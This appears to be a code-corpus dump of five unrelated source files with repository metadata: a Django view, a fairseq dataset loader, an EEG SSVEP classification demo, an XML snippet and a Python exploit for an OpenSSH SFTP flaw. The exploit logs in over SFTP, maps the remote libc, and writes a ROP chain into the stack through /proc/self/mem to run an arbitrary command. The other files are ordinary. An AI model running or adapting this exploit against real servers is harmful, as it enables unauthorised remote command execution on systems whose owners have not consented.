150ef124e051307e4b1000fb4c14a1e6dd8b7691 | 3e44021a7b0c8753e5bb788897358573c21b34db | /apps/users/views.py | c18eb86f906f6002b0f896bae68afd84bb125702 | []
| no_license | DrMartiner/food_diary | e3d07c766aa4c65a9f3fcd6861cade9169442380 | ed5dca3a418247737c2bddbce16a52157cdb16eb | refs/heads/master | 2021-01-01T06:50:34.694745 | 2013-11-23T09:18:41 | 2013-11-23T09:18:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | # -*- coding: utf-8 -*-
from django.views.generic import TemplateView
class MyProfileView(TemplateView):
template_name = 'users/my_profile.html' | [
"[email protected]"
]
| |
85abd7c55bb2a7aeaba405f4803e34ff03e22faf | 94012eacfd1661185dc78886b912a540dab8085a | /openssh/cve_2014_1692.py | 2be9968388b46486816df43baed506b75c7c25c1 | []
| no_license | sshayb/exploit_scripts | 41dc72095a27c5eb0f1370014cfb6bbcf8890e82 | 07755b2c0428187b7cb5f82bca8616735af86b32 | refs/heads/master | 2023-01-02T00:19:30.048200 | 2020-10-26T01:29:12 | 2020-10-26T01:29:12 | 227,637,487 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,627 | py | # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
#
# Adam Simuntis :: https://twitter.com/adamsimuntis
# Mindaugas Slusnys :: https://twitter.com/mislusnys
import paramiko
import sys
import time
#from pwn import *
# parameters
cmd = 'whoami'
host = '10.90.78.29'
port = 22
username = 'root'
password = 'secforce'
# connection
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname = host, port = port, username = username, password = password)
sftp = ssh.open_sftp()
# parse /proc/self/maps to get addresses
log.info("Analysing /proc/self/maps on remote system")
sftp.get('/proc/self/maps','maps')
with open("maps","r") as f:
lines = f.readlines()
for line in lines:
words = line.split()
addr = words[0]
if ("libc" in line and "r-xp" in line):
path = words[-1]
addr = addr.split('-')
BITS = 64 if len(addr[0]) > 8 else 32
print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
libc_base = int(addr[0], 16)
libc_path = path
if ("[stack]" in line):
addr = addr.split("-")
saddr_start = int(addr[0], 16)
saddr_end = int(addr[1], 16)
print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
# download remote libc and extract information
print "[+] Fetching libc from remote system..\n"
sftp.get(str(libc_path), 'libc.so')
e = ELF("libc.so")
sys_addr = libc_base + e.symbols['system']
exit_addr = libc_base + e.symbols['exit']
# gadgets for the RET slide and system()
if BITS == 64:
pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
ret_addr = pop_rdi_ret + 1
else:
ret_addr = libc_base + next(e.search('\xc3'))
print "\n[+] system() @ {}".format(hex(sys_addr))
print "[+] 'ret' @ {}".format(hex(ret_addr))
if BITS == 64:
print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
with sftp.open('/proc/self/mem','rw') as f:
if f.writable():
print "[+] We have r/w permissions for /proc/self/mem! All Good."
else:
print "[-] Fatal error. No r/w permission for mem."
sys.exit(0)
log.info("Patching /proc/self/mem on the remote system")
stack_size = saddr_end - saddr_start
new_stack = ""
print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
#sleep(20)
if BITS == 32:
new_stack += p32(ret_addr) * (stack_size/4)
new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
new_stack += p32(sys_addr)
new_stack += p32(exit_addr)
new_stack += p32(saddr_start)
else:
new_stack += p64(ret_addr) * (stack_size/8)
new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
new_stack += p64(pop_rdi_ret)
new_stack += p64(saddr_start)
new_stack += p64(sys_addr)
new_stack += p64(exit_addr)
# debug info
with open("fake_stack","w") as lg:
lg.write(new_stack)
# write cmd to top off the stack
f.seek(saddr_start)
f.write(cmd + "\x00")
# write the rest from bottom up, we're going to crash at some point
for off in range(stack_size - 32000, 0, -32000):
cur_addr = saddr_start + off
try:
f.seek(cur_addr)
f.write(new_stack[off:off+32000])
except:
print "Stack write failed - that's probably good!"
print "Check if you command was executed..."
sys.exit(0)
sftp.close()
ssh.close()
| [
"[email protected]"
]
| |
09afd1ec9f2a9c10b008d929da2e7cdaf0b635c1 | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /edgelm/examples/wav2vec/unsupervised/data/extracted_features_dataset.py | de470ddc318a5b817f42a7a595ab91eef4ded58e | [
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
]
| permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 4,314 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import contextlib
import numpy as np
import torch
from fairseq.data import FairseqDataset, data_utils
logger = logging.getLogger(__name__)
class ExtractedFeaturesDataset(FairseqDataset):
def __init__(
self,
path,
split,
min_length=3,
max_length=None,
labels=None,
label_dict=None,
shuffle=True,
sort_by_length=True,
):
super().__init__()
self.min_length = min_length
self.max_length = max_length
self.shuffle = shuffle
self.sort_by_length = sort_by_length
self.label_dict = label_dict
if labels is not None:
assert label_dict is not None
self.sizes = []
self.offsets = []
self.labels = []
path = os.path.join(path, split)
data_path = path
self.data = np.load(data_path + ".npy", mmap_mode="r")
offset = 0
skipped = 0
if not os.path.exists(path + f".{labels}"):
labels = None
with open(data_path + ".lengths", "r") as len_f, open(
path + f".{labels}", "r"
) if labels is not None else contextlib.ExitStack() as lbl_f:
for line in len_f:
length = int(line.rstrip())
lbl = None if labels is None else next(lbl_f).rstrip().split()
if length >= min_length and (
max_length is None or length <= max_length
):
self.sizes.append(length)
self.offsets.append(offset)
if lbl is not None:
self.labels.append(lbl)
offset += length
self.sizes = np.asarray(self.sizes)
self.offsets = np.asarray(self.offsets)
logger.info(f"loaded {len(self.offsets)}, skipped {skipped} samples")
def __getitem__(self, index):
offset = self.offsets[index]
end = self.sizes[index] + offset
feats = torch.from_numpy(self.data[offset:end].copy()).float()
res = {"id": index, "features": feats}
if len(self.labels) > 0:
res["target"] = self.label_dict.encode_line(
self.labels[index],
line_tokenizer=lambda x: x,
append_eos=False,
)
return res
def __len__(self):
return len(self.sizes)
def collater(self, samples):
if len(samples) == 0:
return {}
features = [s["features"] for s in samples]
sizes = [len(s) for s in features]
target_size = max(sizes)
collated_features = features[0].new_zeros(
len(features), target_size, features[0].size(-1)
)
padding_mask = torch.BoolTensor(collated_features.shape[:-1]).fill_(False)
for i, (f, size) in enumerate(zip(features, sizes)):
collated_features[i, :size] = f
padding_mask[i, size:] = True
res = {
"id": torch.LongTensor([s["id"] for s in samples]),
"net_input": {"features": collated_features, "padding_mask": padding_mask},
}
if len(self.labels) > 0:
target = data_utils.collate_tokens(
[s["target"] for s in samples],
pad_idx=self.label_dict.pad(),
left_pad=False,
)
res["target"] = target
return res
def num_tokens(self, index):
return self.size(index)
def size(self, index):
return self.sizes[index]
def ordered_indices(self):
"""Return an ordered list of indices. Batches will be constructed based
on this order."""
if self.shuffle:
order = [np.random.permutation(len(self))]
else:
order = [np.arange(len(self))]
if self.sort_by_length:
order.append(self.sizes)
return np.lexsort(order)[::-1]
else:
return order[0]
| [
"tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net"
]
| tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net |
d4839e5d1454adf699dbf34d35ca809c5556285a | 9d13010b35a14c7c9ba55e704c76777f3f380885 | /demo1_sigpro_old.py | 3cff8956f97cf7dfd5507344169e3653f5c95022 | []
| no_license | trzp/BCIpf | 20e5732025bd604c67001c6dc65b479686187646 | fc4d1262b3e286bfde046fbfe5f71f73e6fa4395 | refs/heads/master | 2020-07-26T18:32:04.473503 | 2020-07-23T14:14:45 | 2020-07-23T14:14:45 | 208,733,546 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,587 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/18 9:52
# @Version : 1.0
# @File : demo1_sigpro.py
# @Author : Jingsheng Tang
# @Version : 1.0
# @Contact : [email protected] [email protected]
# @License : (C) All Rights Reserved
from sigpro import SigPro
from sigpro import DefaultCoder
from scipy import signal as scipy_signal
import json
from cca import *
import time
class SigProApp(SigPro):
def __init__(self, configs_path='./config.js'):
super(SigProApp, self).__init__(configs_path)
self.CODER = DefaultCoder()
self.data = []
self.accdata = False
self.calres = False
with open(configs_path,'r') as f:
self.configs = json.loads(f.read())
Fs = self.configs['signal_processing']['samplingrate']
fs = Fs / 2
Wp = [5 / fs, 45 / fs]
Ws = [3 / fs, 48 / fs]
[N, Wn] = scipy_signal.cheb1ord(Wp, Ws, 4, 20)
[self.f_b, self.f_a] = scipy_signal.cheby1(N, 0.5, Wn, btype='bandpass')
self.ff = [8, 9, 11, 12]
t = np.arange(0, 20, 1. / Fs)
self.sx = []
for f in self.ff:
x1 = np.mat(np.sin(2 * np.pi * f * t))
x2 = np.mat(np.cos(2 * np.pi * f * t))
x3 = np.mat(np.sin(4 * np.pi * f * t))
x4 = np.mat(np.cos(4 * np.pi * f * t))
x = np.vstack([x1, x2, x3, x4])
self.sx.append(x)
def process(self, eeg, marker):
if len(marker)>0:
print(marker)
if marker['process']['value'][0] == 1:
self.accdata = True
elif marker['process']['value'][0] == 2:
self.calres = True
self.accdata = False
else:
pass
if self.accdata:
self.data.append(eeg)
if self.calres:
fff = time.clock()
if len(self.data) == 0:
return 0
dd = np.hstack(self.data)
datafilt = scipy_signal.filtfilt(self.f_b, self.f_a, dd) #滤波处理
ll = datafilt.shape[1]
relate = []
for x in self.sx:
a,b,r = cca(x[:,:ll],datafilt)
relate.append(np.max(r))
indx = np.argmax(relate)
self.RESULT = self.ff[indx]
print(self.RESULT)
self.data = []
self.calres = False
print(time.clock()-fff,'??')
return 1
return 0
def main():
sp = SigProApp()
sp.start_run()
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
bbb0735de098f944fb96c589c586fb888bcbabb4 | ba2dbc19e899faaa17b994a1224e455a3de5b9ad | /02 Data Science/1. Collection/1. Format_practice/1. XML/329_3.py | 69ae0e4d1d52868338c053f454ecd5cd50dd8f66 | []
| no_license | xsky21/bigdata2019 | 52d3dc9379a05ba794c53a28284de2168d0fc366 | 19464a6f8862b6e6e3d4e452e0dab85bdd954e40 | refs/heads/master | 2020-04-21T10:56:34.637812 | 2019-04-16T04:16:27 | 2019-04-16T04:16:27 | 169,503,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from xml.etree.ElementTree import Element,dump,SubElement
note = Element('note', date="20120104") #attrib를 써서 속성을 추가하는 것과 같은 결과가 나온다
to = Element('to') #자식 노드
to.text = "Tove"
note.append(to)
SubElement(note,"from_tag").text="Jani"
dump(note)
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.